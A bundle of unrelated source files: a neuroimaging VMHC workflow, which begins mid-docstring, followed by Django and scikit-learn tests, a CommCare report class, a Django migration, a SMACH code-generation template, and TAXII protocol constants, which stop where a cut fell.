rest_res_2symmstandard.nii.gz
tmp_LRflipped.nii.gz
- Fisher Z Transform the correlation. For details see `3dcalc <http://afni.nimh.nih.gov/pub/dist/doc/program_help/3dcalc.html>`_::
3dcalc
-a VMHC_FWHM.nii.gz
-expr 'log((a+1)/(1-a))/2'
-prefix VMHC_FWHM_Z.nii.gz
- Calculate the number of volumes (nvols) in the flipped rest_res_2symmstandard.nii.gz (tmp_LRflipped.nii.gz)::
- Use Nibabel to do this
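For example, a minimal sketch using Nibabel (illustrative only; the workflow itself delegates this to the get_img_nvols utility)::
import nibabel as nib
nvols = nib.load('tmp_LRflipped.nii.gz').shape[3]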
- Compute the Z statistic map ::
3dcalc
-a VMHC_FWHM_Z.nii.gz
-expr 'a*sqrt('${nvols}'-3)'
-prefix VMHC_FWHM_Z_stat.nii.gz
Workflow:
.. image:: ../images/vmhc_graph.dot.png
:width: 500
Workflow Detailed:
.. image:: ../images/vmhc_detailed_graph.dot.png
:width: 500
References
----------
.. [1] Zuo, X.-N., Kelly, C., Di Martino, A., Mennes, M., Margulies, D. S., Bangaru, S., Grzadzinski, R., et al. (2010). Growing together and growing apart: regional and sex differences in the lifespan developmental trajectories of functional homotopy. The Journal of neuroscience : the official journal of the Society for Neuroscience, 30(45), 15034-43. doi:10.1523/JNEUROSCI.2612-10.2010
Examples
--------
>>> vmhc_w = create_vmhc(use_ants=False)
>>> vmhc_w.inputs.inputspec.brain_symmetric = 'MNI152_T1_2mm_brain_symmetric.nii.gz'
>>> vmhc_w.inputs.inputspec.symm_standard = 'MNI152_T1_2mm_symmetric.nii.gz'
>>> vmhc_w.inputs.inputspec.twomm_brain_mask_dil = 'MNI152_T1_2mm_brain_mask_symmetric_dil.nii.gz'
>>> vmhc_w.inputs.inputspec.config_file_twomm = 'T1_2_MNI152_2mm_symmetric.cnf'
>>> vmhc_w.inputs.inputspec.standard = 'MNI152_T1_2mm.nii.gz'
>>> vmhc_w.inputs.fwhm_input.fwhm = [4.5, 6]
>>> vmhc_w.get_node('fwhm_input').iterables = ('fwhm', [4.5, 6])
>>> vmhc_w.inputs.inputspec.rest_res = os.path.abspath('/home/data/Projects/Pipelines_testing/Dickstein/subjects/s1001/func/original/rest_res_filt.nii.gz')
>>> vmhc_w.inputs.inputspec.reorient = os.path.abspath('/home/data/Projects/Pipelines_testing/Dickstein/subjects/s1001/anat/mprage_RPI.nii.gz')
>>> vmhc_w.inputs.inputspec.brain = os.path.abspath('/home/data/Projects/Pipelines_testing/Dickstein/subjects/s1001/anat/mprage_brain.nii.gz')
>>> vmhc_w.inputs.inputspec.example_func2highres_mat = os.path.abspath('/home/data/Projects/Pipelines_testing/Dickstein/subjects/s1001/func/original/reg/example_func2highres.mat')
>>> vmhc_w.inputs.inputspec.rest_mask = os.path.abspath('/home/data/Projects/Pipelines_testing/Dickstein/subjects/s1001/func/original/rest_mask.nii.gz')
>>> vmhc_w.run() # doctest: +SKIP
"""
vmhc = pe.Workflow(name='vmhc_workflow')
inputNode = pe.Node(util.IdentityInterface(fields=['brain',
'brain_symmetric',
'rest_res',
'reorient',
'example_func2highres_mat',
'symm_standard',
'twomm_brain_mask_dil',
'config_file_twomm',
'rest_mask',
'standard',
'mean_functional']),
name='inputspec')
outputNode = pe.Node(util.IdentityInterface(fields=['highres2symmstandard',
'highres2symmstandard_mat',
'highres2symmstandard_warp',
'fnirt_highres2symmstandard',
'highres2symmstandard_jac',
'rest_res_2symmstandard',
'VMHC_FWHM_img',
'VMHC_Z_FWHM_img',
'VMHC_Z_stat_FWHM_img'
]),
name='outputspec')
inputnode_fwhm = pe.Node(util.IdentityInterface(fields=['fwhm']),
name='fwhm_input')
if not use_ants:
## Linear registration of T1 --> symmetric standard
linear_T1_to_symmetric_standard = pe.Node(interface=fsl.FLIRT(),
name='linear_T1_to_symmetric_standard')
linear_T1_to_symmetric_standard.inputs.cost = 'corratio'
linear_T1_to_symmetric_standard.inputs.cost_func = 'corratio'
linear_T1_to_symmetric_standard.inputs.dof = 12
linear_T1_to_symmetric_standard.inputs.interp = 'trilinear'
## Perform nonlinear registration
## (highres to standard) to symmetric standard brain
nonlinear_highres_to_symmetric_standard = pe.Node(interface=fsl.FNIRT(),
name='nonlinear_highres_to_symmetric_standard')
nonlinear_highres_to_symmetric_standard.inputs.fieldcoeff_file = True
nonlinear_highres_to_symmetric_standard.inputs.jacobian_file = True
nonlinear_highres_to_symmetric_standard.inputs.warp_resolution = (10, 10, 10)
# needs new inputs. needs input from resources for the field coeff of the template->symmetric.
# and needs the field coeff of the anatomical-to-template registration
## Apply nonlinear registration (func to standard)
nonlinear_func_to_standard = pe.Node(interface=fsl.ApplyWarp(),
name='nonlinear_func_to_standard')
elif use_ants:
# ANTS warp image etc.
calculate_ants_xfm_vmhc = create_wf_calculate_ants_warp(name='calculate_ants_xfm_vmhc')
fsl_to_itk_vmhc = create_wf_c3d_fsl_to_itk(0, name='fsl_to_itk_vmhc')
collect_transforms_vmhc = create_wf_collect_transforms(0, name='collect_transforms_vmhc')
apply_ants_xfm_vmhc = create_wf_apply_ants_warp(0,name='apply_ants_xfm_vmhc')
calculate_ants_xfm_vmhc.inputs.inputspec.dimension = 3
calculate_ants_xfm_vmhc.inputs.inputspec. \
use_histogram_matching = True
calculate_ants_xfm_vmhc.inputs.inputspec. \
winsorize_lower_quantile = 0.01
calculate_ants_xfm_vmhc.inputs.inputspec. \
winsorize_upper_quantile = 0.99
calculate_ants_xfm_vmhc.inputs.inputspec. \
metric = ['MI','MI','CC']
calculate_ants_xfm_vmhc.inputs.inputspec.metric_weight = [1,1,1]
calculate_ants_xfm_vmhc.inputs.inputspec. \
radius_or_number_of_bins = [32,32,4]
calculate_ants_xfm_vmhc.inputs.inputspec. \
sampling_strategy = ['Regular','Regular',None]
calculate_ants_xfm_vmhc.inputs.inputspec. \
sampling_percentage = [0.25,0.25,None]
calculate_ants_xfm_vmhc.inputs.inputspec. \
number_of_iterations = [[1000,500,250,100], \
[1000,500,250,100], [100,100,70,20]]
calculate_ants_xfm_vmhc.inputs.inputspec. \
convergence_threshold = [1e-8,1e-8,1e-9]
calculate_ants_xfm_vmhc.inputs.inputspec. \
convergence_window_size = [10,10,15]
calculate_ants_xfm_vmhc.inputs.inputspec. \
transforms = ['Rigid','Affine','SyN']
calculate_ants_xfm_vmhc.inputs.inputspec. \
transform_parameters = [[0.1],[0.1],[0.1,3,0]]
calculate_ants_xfm_vmhc.inputs.inputspec. \
shrink_factors = [[8,4,2,1],[8,4,2,1],[6,4,2,1]]
calculate_ants_xfm_vmhc.inputs.inputspec. \
smoothing_sigmas = [[3,2,1,0],[3,2,1,0],[3,2,1,0]]
apply_ants_xfm_vmhc.inputs.inputspec.interpolation = 'Gaussian'
apply_ants_xfm_vmhc.inputs.inputspec.input_image_type = 3
## copy and L/R swap file
copy_and_L_R_swap = pe.Node(interface=fsl.SwapDimensions(),
name='copy_and_L_R_swap')
copy_and_L_R_swap.inputs.new_dims = ('-x', 'y', 'z')
## calculate vmhc
pearson_correlation = pe.Node(interface=preprocess.TCorrelate(),
name='pearson_correlation')
pearson_correlation.inputs.pearson = True
pearson_correlation.inputs.polort = -1
pearson_correlation.inputs.outputtype = 'NIFTI_GZ'
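## Fisher Z transform of the correlation map, then conversion to a Z statistic map (the two 3dcalc steps described in the docstring)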
z_trans = pe.Node(interface=preprocess.Calc(),
name='z_trans')
z_trans.inputs.expr = 'log((1+a)/(1-a))/2'
z_trans.inputs.outputtype = 'NIFTI_GZ'
z_stat = pe.Node(interface=preprocess.Calc(),
name='z_stat')
z_stat.inputs.outputtype = 'NIFTI_GZ'
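## count the volumes (time points) in the flipped functional image; get_img_nvols is assumed to come from the star-imported utils module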
NVOLS = pe.Node(util.Function(input_names=['in_files'],
output_names=['nvols'],
function=get_img_nvols),
name='NVOLS')
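## build the 3dcalc expression 'a*sqrt(nvols-3)' used for the Z statistic map (per the docstring's "Compute the Z statistic map" step)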
generateEXP = pe.Node(util.Function(input_names=['nvols'],
output_names=['expr'],
function=get_operand_expression),
name='generateEXP')
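## spatial smoothing of the functional data; the fslmaths op string is built from the fwhm value by set_gauss (see the smoothing step in the docstring)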
smooth = pe.Node(interface=fsl.MultiImageMaths(),
name='smooth')
if not use_ants:
vmhc.connect(inputNode, 'brain',
linear_T1_to_symmetric_standard, 'in_file')
vmhc.connect(inputNode, 'brain_symmetric',
linear_T1_to_symmetric_standard, 'reference')
vmhc.connect(inputNode, 'reorient',
nonlinear_highres_to_symmetric_standard, 'in_file')
vmhc.connect(linear_T1_to_symmetric_standard, 'out_matrix_file',
nonlinear_highres_to_symmetric_standard, 'affine_file')
vmhc.connect(inputNode, 'symm_standard',
nonlinear_highres_to_symmetric_standard, 'ref_file')
vmhc.connect(inputNode, 'twomm_brain_mask_dil',
nonlinear_highres_to_symmetric_standard, 'refmask_file')
vmhc.connect(inputNode, 'config_file_twomm',
nonlinear_highres_to_symmetric_standard, 'config_file')
vmhc.connect(inputNode, 'rest_res',
smooth, 'in_file')
vmhc.connect(inputnode_fwhm, ('fwhm', set_gauss),
smooth, 'op_string')
vmhc.connect(inputNode, 'rest_mask',
smooth, 'operand_files')
vmhc.connect(smooth, 'out_file',
nonlinear_func_to_standard, 'in_file')
vmhc.connect(inputNode, 'standard',
nonlinear_func_to_standard, 'ref_file')
vmhc.connect(nonlinear_highres_to_symmetric_standard, 'fieldcoeff_file',
nonlinear_func_to_standard, 'field_file')
## func->anat matrix (bbreg)
vmhc.connect(inputNode, 'example_func2highres_mat',
nonlinear_func_to_standard, 'premat')
vmhc.connect(nonlinear_func_to_standard, 'out_file',
copy_and_L_R_swap, 'in_file')
vmhc.connect(nonlinear_func_to_standard, 'out_file',
pearson_correlation, 'xset')
elif use_ants:
# connections for ANTS stuff
# registration calculation stuff -- might go out the window
vmhc.connect(inputNode, 'brain',
calculate_ants_xfm_vmhc, 'inputspec.anatomical_brain')
vmhc.connect(inputNode, 'brain_symmetric',
calculate_ants_xfm_vmhc, 'inputspec.reference_brain')
# functional apply warp stuff
vmhc.connect(inputNode, 'rest_res',
smooth, 'in_file')
vmhc.connect(inputnode_fwhm, ('fwhm', set_gauss),
smooth, 'op_string')
vmhc.connect(inputNode, 'rest_mask',
smooth, 'operand_files')
vmhc.connect(smooth, 'out_file',
apply_ants_xfm_vmhc, 'inputspec.input_image')
vmhc.connect(calculate_ants_xfm_vmhc, 'outputspec.ants_rigid_xfm',
collect_transforms_vmhc, 'inputspec.linear_rigid')
vmhc.connect(calculate_ants_xfm_vmhc, 'outputspec.ants_affine_xfm',
collect_transforms_vmhc, 'inputspec.linear_affine')
vmhc.connect(calculate_ants_xfm_vmhc, 'outputspec.warp_field',
collect_transforms_vmhc, 'inputspec.warp_file')
## func->anat matrix (bbreg)
vmhc.connect(inputNode, 'example_func2highres_mat',
fsl_to_itk_vmhc, 'inputspec.affine_file')
vmhc.connect(inputNode, 'brain', fsl_to_itk_vmhc,
'inputspec.reference_file')
vmhc.connect(inputNode, 'mean_functional', fsl_to_itk_vmhc,
'inputspec.source_file')
vmhc.connect(fsl_to_itk_vmhc, 'outputspec.itk_transform',
collect_transforms_vmhc, 'inputspec.fsl_to_itk_affine')
'''
vmhc.connect(inputNode, 'brain',
apply_ants_xfm_vmhc, 'inputspec.conversion_reference')
vmhc.connect(inputNode, 'mean_functional',
apply_ants_xfm_vmhc, 'inputspec.conversion_source')
'''
vmhc.connect(inputNode, 'brain_symmetric',
apply_ants_xfm_vmhc, 'inputspec.reference_image')
vmhc.connect(collect_transforms_vmhc, \
'outputspec.transformation_series', \
apply_ants_xfm_vmhc, 'inputspec.transforms')
vmhc.connect(apply_ants_xfm_vmhc, 'outputspec.output_image',
copy_and_L_R_swap, 'in_file')
vmhc.connect(apply_ants_xfm_vmhc, 'outputspec.output_image',
pearson_correlation, 'xset')
vmhc.connect(copy_and_L_R_swap, 'out_file',
pearson_correlation, 'yset')
vmhc.connect(pearson_correlation, 'out_file',
z_trans, 'in_file_a')
vmhc.connect(copy_and_L_R_swap, 'out_file',
NVOLS, 'in_files')
vmhc.connect(NVOLS, 'nvols',
generateEXP, 'nvols')
vmhc.connect(z_trans, 'out_file',
z_stat, 'in_file_a')
vmhc.connect(generateEXP, 'expr',
z_stat, 'expr')
if not use_ants:
vmhc.connect(linear_T1_to_symmetric_standard, 'out_file',
outputNode, 'highres2symmstandard')
vmhc.connect(linear_T1_to_symmetric_standard, 'out_matrix_file',
outputNode, 'highres2symmstandard_mat')
vmhc.connect(nonlinear_highres_to_symmetric_standard, 'jacobian_file',
outputNode, 'highres2symmstandard_jac')
vmhc.connect(nonlinear_highres_to_symmetric_standard, 'fieldcoeff_file',
outputNode, 'highres2symmstandard_warp')
vmhc.connect(nonlinear_highres_to_symmetric_standard, 'warped_file',
outputNode, 'fnirt_highres2symmstandard')
vmhc.connect(nonlinear_func_to_standard, 'out_file',
outputNode, 'rest_res_2symmstandard')
elif use_ants:
# ANTS warp outputs to outputnode
vmhc.connect(calculate_ants_xfm_vmhc, 'outputspec.ants_affine_xfm',
outputNode, 'highres2symmstandard_mat')
vmhc.connect(calculate_ants_xfm_vmhc, 'outputspec.warp_field',
outputNode, 'highres2symmstandard_warp')
vmhc.connect(calculate_ants_xfm_vmhc, 'outputspec.normalized_output_brain',
outputNode, 'fnirt_highres2symmstandard')
vmhc.connect(apply_ants_xfm_vmhc, 'outputspec.output_image',
outputNode, 'rest_res_2symmstandard')
vmhc.connect(pearson_correlation, 'out_file',
outputNode, 'VMHC_FWHM_img')
vmhc.connect(z_trans, 'out_file',
outputNode, 'VMHC_Z_FWHM_img')
vmhc.connect(z_stat, 'out_file',
outputNode, 'VMHC_Z_stat_FWHM_img')
return vmhc
|
import mock
from rest_framework import serializers
from waffle.testutils import override_switch
from olympia.amo.tests import (
BaseTestCase, addon_factory, collection_factory, TestCase, user_factory)
from olympia.bandwagon.models import CollectionAddon
from olympia.bandwagon.serializers import (
CollectionAddonSerializer, CollectionAkismetSpamValidator,
CollectionSerializer, CollectionWithAddonsSerializer)
from olympia.lib.akismet.models import AkismetReport
class TestCollectionAkismetSpamValidator(TestCase):
def setUp(self):
self.validator = CollectionAkismetSpamValidator(
('name', 'description'))
serializer = mock.Mock()
serializer.instance = collection_factory(
name='name', description='Big Cheese')
request = mock.Mock()
request.user = user_factory()
request.META = {}
serializer.context = {'request': request}
self.validator.set_context(serializer)
self.data = {
'name': {'en-US': 'Collection', 'fr': u'Collection'},
'description': {'en-US': 'Big Cheese', 'fr': u'une gránd fromagé'},
'random_data': {'en-US': 'to ignore'},
'slug': 'cheese'}
@override_switch('akismet-spam-check', active=False)
@mock.patch('olympia.lib.akismet.models.AkismetReport.comment_check')
def test_waffle_off(self, comment_check_mock):
self.validator(self.data)
# No Akismet checks
assert AkismetReport.objects.count() == 0
comment_check_mock.assert_not_called()
@override_switch('akismet-spam-check', active=True)
@mock.patch('olympia.lib.akismet.models.AkismetReport.comment_check')
def test_ham(self, comment_check_mock):
comment_check_mock.return_value = AkismetReport.HAM
self.validator(self.data)
# Akismet check is there
assert AkismetReport.objects.count() == 2
name_report = AkismetReport.objects.first()
# name is only checked once because the en-US and fr values are identical.
assert name_report.comment_type == 'collection-name'
assert name_report.comment == self.data['name']['en-US']
summary_report = AkismetReport.objects.last()
# the en-US description isn't checked because it matches the existing description.
assert summary_report.comment_type == 'collection-description'
assert summary_report.comment == self.data['description']['fr']
assert comment_check_mock.call_count == 2
@override_switch('akismet-spam-check', active=True)
@mock.patch('olympia.lib.akismet.models.AkismetReport.comment_check')
def test_spam(self, comment_check_mock):
comment_check_mock.return_value = AkismetReport.MAYBE_SPAM
with self.assertRaises(serializers.ValidationError):
self.validator(self.data)
# Akismet check is there
assert AkismetReport.objects.count() == 2
name_report = AkismetReport.objects.first()
# name is only checked once because the en-US and fr values are identical.
assert name_report.comment_type == 'collection-name'
assert name_report.comment == self.data['name']['en-US']
summary_report = AkismetReport.objects.last()
# the en-US description isn't checked because it matches the existing description.
assert summary_report.comment_type == 'collection-description'
assert summary_report.comment == self.data['description']['fr']
# Once the first comment_check reports spam, additional checks are skipped.
assert comment_check_mock.call_count == 1
class TestCollectionSerializer(BaseTestCase):
serializer = CollectionSerializer
def setUp(self):
super(TestCollectionSerializer, self).setUp()
self.user = user_factory()
self.collection = collection_factory()
self.collection.update(author=self.user)
def serialize(self):
return self.serializer(self.collection).data
def test_basic(self):
data = self.serialize()
assert data['id'] == self.collection.id
assert data['uuid'] == self.collection.uuid
assert data['name'] == {'en-US': self.collection.name}
assert data['description'] == {'en-US': self.collection.description}
assert data['url'] == self.collection.get_abs_url()
assert data['addon_count'] == self.collection.addon_count
assert data['modified'] == (
self.collection.modified.replace(microsecond=0).isoformat() + 'Z')
assert data['author']['id'] == self.user.id
assert data['slug'] == self.collection.slug
assert data['public'] == self.collection.listed
assert data['default_locale'] == self.collection.default_locale
class TestCollectionAddonSerializer(BaseTestCase):
def setUp(self):
self.collection = collection_factory()
self.addon = addon_factory()
self.collection.add_addon(self.addon)
self.item = CollectionAddon.objects.get(addon=self.addon,
collection=self.collection)
self.item.comments = u'Dis is nice'
self.item.save()
def serialize(self):
return CollectionAddonSerializer(self.item).data
def test_basic(self):
data = self.serialize()
assert data['addon']['id'] == self.collection.addons.all()[0].id
assert data['notes'] == {'en-US': self.item.comments}
class TestCollectionWithAddonsSerializer(TestCollectionSerializer):
serializer = CollectionWithAddonsSerializer
def setUp(self):
super(TestCollectionWithAddonsSerializer, self).setUp()
self.addon = addon_factory()
self.collection.add_addon(self.addon)
def serialize(self):
mock_viewset = mock.MagicMock()
collection_addons = CollectionAddon.objects.filter(
addon=self.addon, collection=self.collection)
mock_viewset.get_addons_queryset.return_value = collection_addons
return self.serializer(
self.collection, context={'view': mock_viewset}).data
def test_basic(self):
super(TestCollectionWithAddonsSerializer, self).test_basic()
collection_addon = CollectionAddon.objects.get(
addon=self.addon, collection=self.collection)
data = self.serialize()
assert data['addons'] == [
CollectionAddonSerializer(collection_addon).data
]
assert data['addons'][0]['addon']['id'] == self.addon.id
|
from django.utils.safestring import mark_safe
from corehq.apps.data_interfaces.dispatcher import EditDataInterfaceDispatcher
from corehq.apps.groups.models import Group
from django.core.urlresolvers import reverse
from corehq.apps.reports import util
from corehq.apps.reports.datatables import DataTablesHeader, DataTablesColumn, DTSortType
from corehq.apps.reports.generic import GenericReportView
from corehq.apps.reports.models import HQUserType
from corehq.apps.reports.standard.cases.basic import CaseListMixin
from corehq.apps.reports.standard.cases.data_sources import CaseDisplay
from dimagi.utils.decorators.memoized import memoized
from django.utils.translation import ugettext_noop
from django.utils.translation import ugettext as _
class DataInterface(GenericReportView):
# overriding properties from GenericReportView
section_name = ugettext_noop("Data")
base_template = "reports/standard/base_template.html"
asynchronous = True
dispatcher = EditDataInterfaceDispatcher
exportable = False
@property
def default_report_url(self):
return reverse('data_interfaces_default', args=[self.request.project])
class CaseReassignmentInterface(CaseListMixin, DataInterface):
name = ugettext_noop("Reassign Cases")
slug = "reassign_cases"
report_template_path = 'data_interfaces/interfaces/case_management.html'
asynchronous = False
ajax_pagination = True
@property
@memoized
def all_case_sharing_groups(self):
return Group.get_case_sharing_groups(self.domain)
@property
def headers(self):
headers = DataTablesHeader(
DataTablesColumn(mark_safe('Select <a href="#" class="select-all btn btn-mini btn-inverse">all</a> <a href="#" class="select-none btn btn-mini btn-warning">none</a>'), sortable=False, span=2),
DataTablesColumn(_("Case Name"), span=3, prop_name="name.exact"),
DataTablesColumn(_("Case Type"), span=2, prop_name="type.exact"),
DataTablesColumn(_("Owner"), span=2, prop_name="owner_display", sortable=False),
DataTablesColumn(_("Last Modified"), span=3, prop_name="modified_on"),
)
return headers
@property
def rows(self):
checkbox = mark_safe('<input type="checkbox" class="selected-commcare-case" data-bind="event: {change: updateCaseSelection}" data-caseid="%(case_id)s" data-owner="%(owner)s" data-ownertype="%(owner_type)s" />')
for row in self.es_results['hits'].get('hits', []):
case = self.get_case(row)
display = CaseDisplay(self, case)
yield [
checkbox % dict(case_id=case['_id'], owner=display.owner_id, owner_type=display.owner_type),
display.case_link,
display.case_type,
display.owner_display,
util.format_relative_date(display.parse_date(display.case['modified_on']))['html'],
]
@property
def report_context(self):
context = super(CaseReassignmentInterface, self).report_context
active_users = self.get_all_users_by_domain(user_filter=tuple(HQUserType.use_defaults()), simplified=True)
context.update(
users=[dict(ownerid=user.get('user_id'), name=user.get('username_in_report'), type="user")
for user in active_users],
groups=[dict(ownerid=group.get_id, name=group.name, type="group")
for group in self.all_case_sharing_groups],
user_ids=self.user_ids,
)
return context
|
import numpy as np
import pandas as pd
import pytest
from sklearn.ensemble import ExtraTreesClassifier
from sklearn.impute import SimpleImputer
from sklearn.model_selection import GridSearchCV, cross_val_score
from sklearn.pipeline import Pipeline
from sklearn.preprocessing import FunctionTransformer, StandardScaler
from featuretools.demo.mock_customer import load_mock_customer
from featuretools.wrappers import DFSTransformer
def select_numeric(df):
return df.select_dtypes(exclude=['object'])
@pytest.fixture(scope='module')
def es():
es = load_mock_customer(n_customers=15,
n_products=15,
n_sessions=75,
n_transactions=1000,
random_seed=0,
return_entityset=True)
return es
@pytest.fixture(scope='module')
def df(es):
df = es['customers'].df
df['target'] = np.random.randint(1, 3, df.shape[0]) # 1 or 2 values
return df
@pytest.fixture(scope='module')
def pipeline(es):
pipeline = Pipeline(steps=[
('ft', DFSTransformer(entityset=es,
target_entity="customers",
max_features=20)),
("numeric", FunctionTransformer(select_numeric, validate=False)),
('imp', SimpleImputer()),
('et', ExtraTreesClassifier(n_estimators=10))
])
return pipeline
def test_sklearn_transformer(es, df):
# Using with transformers
pipeline = Pipeline(steps=[
('ft', DFSTransformer(entityset=es,
target_entity="customers")),
("numeric", FunctionTransformer(select_numeric, validate=False)),
('sc', StandardScaler()),
])
X_train = pipeline.fit(df['customer_id']).transform(df['customer_id'])
assert X_train.shape[0] == 15
def test_sklearn_estimator(df, pipeline):
# Using with estimator
pipeline.fit(df['customer_id'].values, y=df.target.values) \
.predict(df['customer_id'].values)
result = pipeline.score(df['customer_id'].values, df.target.values)
    assert isinstance(result, float)
# Pickling / Unpickling Pipeline
# TODO fix this
# s = pickle.dumps(pipeline)
# pipe_pickled = pickle.loads(s)
# result = pipe_pickled.score(df['customer_id'].values, df.target.values)
# assert isinstance(result, (float))
def test_sklearn_cross_val_score(df, pipeline):
# Using with cross_val_score
results = cross_val_score(pipeline,
X=df['customer_id'].values,
y=df.target.values,
cv=2,
scoring="accuracy")
    assert isinstance(results[0], float)
    assert isinstance(results[1], float)
def test_sklearn_gridsearchcv(df, pipeline):
# Using with GridSearchCV
params = {
'et__max_depth': [5, 10]
}
grid = GridSearchCV(estimator=pipeline,
param_grid=params,
cv=3)
grid.fit(df['customer_id'].values, df.target.values)
assert len(grid.predict(df['customer_id'].values)) == 15
def test_sklearn_cutoff(pipeline):
    # Using cutoff_time to filter data
ct = pd.DataFrame()
ct['customer_id'] = [1, 2, 3]
ct['time'] = pd.to_datetime(['2014-1-1 04:00',
'2014-1-1 04:00',
'2014-1-1 04:00'])
ct['label'] = [True, True, False]
results = pipeline.fit(ct, y=ct.label).predict(ct)
assert len(results) == 3
|
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('controlled_vocabularies', '0001_initial'),
]
operations = [
migrations.AlterField(
model_name='property',
name='label',
field=models.TextField(help_text=b'The value for the added property.'),
),
migrations.AlterField(
model_name='property',
name='property_name',
field=models.CharField(choices=[(b'definition', b'Definition'), (b'description', b'Description'), (b'note', b'Note'), (b'system', b'System')], help_text=b"The name of the added property; e.g., 'Description'.", max_length=50, verbose_name=b'Property Type'),
),
migrations.AlterField(
model_name='term',
name='label',
field=models.CharField(help_text=b'The human-readable name of the term.', max_length=255),
),
migrations.AlterField(
model_name='term',
name='name',
field=models.CharField(help_text=b'The name or key that uniquely identifies the term within the vocabulary.', max_length=50),
),
migrations.AlterField(
model_name='term',
name='order',
field=models.IntegerField(blank=True, help_text=b'The preferred order for viewing the term in the vocabulary.', null=True),
),
migrations.AlterField(
model_name='term',
name='vocab_list',
field=models.ForeignKey(help_text=b'The vocabulary that the term needs to be added to.', on_delete=django.db.models.deletion.CASCADE, to='controlled_vocabularies.Vocabulary', verbose_name=b'Vocabulary'),
),
migrations.AlterField(
model_name='vocabulary',
name='definition',
field=models.TextField(blank=True, help_text=b'A brief statement of the meaning of the vocabulary.'),
),
migrations.AlterField(
model_name='vocabulary',
name='label',
field=models.CharField(help_text=b'The human-readable name of the vocabulary.', max_length=255),
),
migrations.AlterField(
model_name='vocabulary',
name='maintainer',
field=models.CharField(help_text=b'The person responsible for creating and updating the vocabulary.', max_length=50),
),
migrations.AlterField(
model_name='vocabulary',
name='maintainerEmail',
field=models.CharField(help_text=b'E-mail address of maintainer.', max_length=50, verbose_name=b'Maintainer E-mail'),
),
migrations.AlterField(
model_name='vocabulary',
name='name',
field=models.CharField(help_text=b'The name or key that uniquely identifies the vocabulary.', max_length=50, unique=True),
),
migrations.AlterField(
model_name='vocabulary',
name='order',
field=models.CharField(choices=[(b'name', b'name'), (b'label', b'label'), (b'order', b'order')], help_text=b'The preferred order for viewing the UNTL list of controlled vocabularies.', max_length=10),
),
]
|
{% block meta %}
name: Base
description: SMACH base template.
language: Python
framework: SMACH
type: Base
tags: [core]
includes: []
extends: []
variables:
- - manifest:
description: ROS manifest name.
type: str
- - node_name:
description: ROS node name for the state machine.
type: str
- outcomes:
description: A list of possible outcomes of the state machine.
type: list
- - userdata:
description: Definitions for userdata needed by child states.
type: dict
- - function_name:
description: A name for the main executable state machine function.
type: str
input_keys: []
output_keys: []
{% endblock meta %}
{% from "Utils.tpl.py" import import_module, render_outcomes, render_userdata %}
{% set defined_headers = [] %}
{% set local_vars = [] %}
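{# Bookkeeping lists shared with the Utils macros (e.g. import_module) to track headers and variables that have already been rendered. #}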
{% block base_header %}
{{ base_header }}
{% endblock base_header %}
{% block imports %}
{{ import_module(defined_headers, 'smach') }}
{{ imports }}
{% endblock imports %}
{% block defs %}
{{ defs }}
{% endblock defs %}
{% block class_defs %}
{{ class_defs }}
{% endblock class_defs %}
{% block cb_defs %}
{{ cb_defs }}
{% endblock cb_defs %}
{% if name is defined %}{% set sm_name = name | lower() %}{% else %}{% set sm_name = 'sm' %}{% endif %}
{% block main_def %}
def {% if function_name is defined %}{{ function_name | lower() }}{% else %}main{% endif %}():
{{ main_def | indent(4) }}
{% endblock main_def %}
{% block body %}
{{ sm_name }} = smach.StateMachine({{ render_outcomes(outcomes) }})
{# Container header insertion variable indexed by container state name #}
{% if name in header %}{{ header[name] | indent(4, true) }}{% endif %}
{# Render container userdata #}
{% if userdata is defined %}{{ render_userdata(name | lower(), userdata) | indent(4) }}{% endif %}
{# Render state userdata #}
{% if name in header_userdata %}{{ header_userdata[name] | indent(4, true) }}{% endif %}
with {{ sm_name }}:
{# Container body insertion variable #}
{{ body | indent(8) }}
{% endblock body %}
{% block footer %}
{{ footer | indent(8) }}
{% endblock footer %}
{% block execute %}
{{ execute | indent(4) }}
outcome = {{ sm_name }}.execute()
{% endblock execute %}
{% block base_footer %}
{{ base_footer | indent(4) }}
{% endblock base_footer %}
{% block main %}
if __name__ == '__main__':
{{ '' | indent(4, true) }}{% if function_name is defined %}{{ function_name | lower() }}{% else %}main{% endif %}()
{% endblock main %}
|
NS_MAP = {
'taxii': 'http://taxii.mitre.org/messages/taxii_xml_binding-1',
'taxii_11': 'http://taxii.mitre.org/messages/taxii_xml_binding-1.1',
'tdq': 'http://taxii.mitre.org/query/taxii_default_query-1',
}
ns_map = NS_MAP
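# Message type identifiers used in TAXII 1.0 and 1.1 messages.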
MSG_STATUS_MESSAGE = 'Status_Message'
MSG_DISCOVERY_REQUEST = 'Discovery_Request'
MSG_DISCOVERY_RESPONSE = 'Discovery_Response'
MSG_FEED_INFORMATION_REQUEST = 'Feed_Information_Request'
MSG_FEED_INFORMATION_RESPONSE = 'Feed_Information_Response'
MSG_MANAGE_FEED_SUBSCRIPTION_REQUEST = 'Subscription_Management_Request'
MSG_MANAGE_FEED_SUBSCRIPTION_RESPONSE = 'Subscription_Management_Response'
MSG_POLL_REQUEST = 'Poll_Request'
MSG_POLL_RESPONSE = 'Poll_Response'
MSG_INBOX_MESSAGE = 'Inbox_Message'
MSG_TYPES_10 = (MSG_STATUS_MESSAGE, MSG_DISCOVERY_REQUEST, MSG_DISCOVERY_RESPONSE,
MSG_FEED_INFORMATION_REQUEST, MSG_FEED_INFORMATION_RESPONSE,
MSG_MANAGE_FEED_SUBSCRIPTION_REQUEST,
MSG_MANAGE_FEED_SUBSCRIPTION_RESPONSE, MSG_POLL_REQUEST,
MSG_POLL_RESPONSE, MSG_INBOX_MESSAGE)
MSG_POLL_FULFILLMENT_REQUEST = 'Poll_Fulfillment'
MSG_COLLECTION_INFORMATION_REQUEST = 'Collection_Information_Request'
MSG_COLLECTION_INFORMATION_RESPONSE = 'Collection_Information_Response'
MSG_MANAGE_COLLECTION_SUBSCRIPTION_REQUEST = 'Subscription_Management_Request'
MSG_MANAGE_COLLECTION_SUBSCRIPTION_RESPONSE = 'Subscription_Management_Response'
MSG_TYPES_11 = (MSG_STATUS_MESSAGE, MSG_DISCOVERY_REQUEST, MSG_DISCOVERY_RESPONSE,
MSG_COLLECTION_INFORMATION_REQUEST, MSG_COLLECTION_INFORMATION_RESPONSE,
MSG_MANAGE_COLLECTION_SUBSCRIPTION_REQUEST,
MSG_MANAGE_COLLECTION_SUBSCRIPTION_RESPONSE, MSG_POLL_REQUEST,
MSG_POLL_RESPONSE, MSG_INBOX_MESSAGE, MSG_POLL_FULFILLMENT_REQUEST)
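# Status types carried by TAXII Status Messages.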
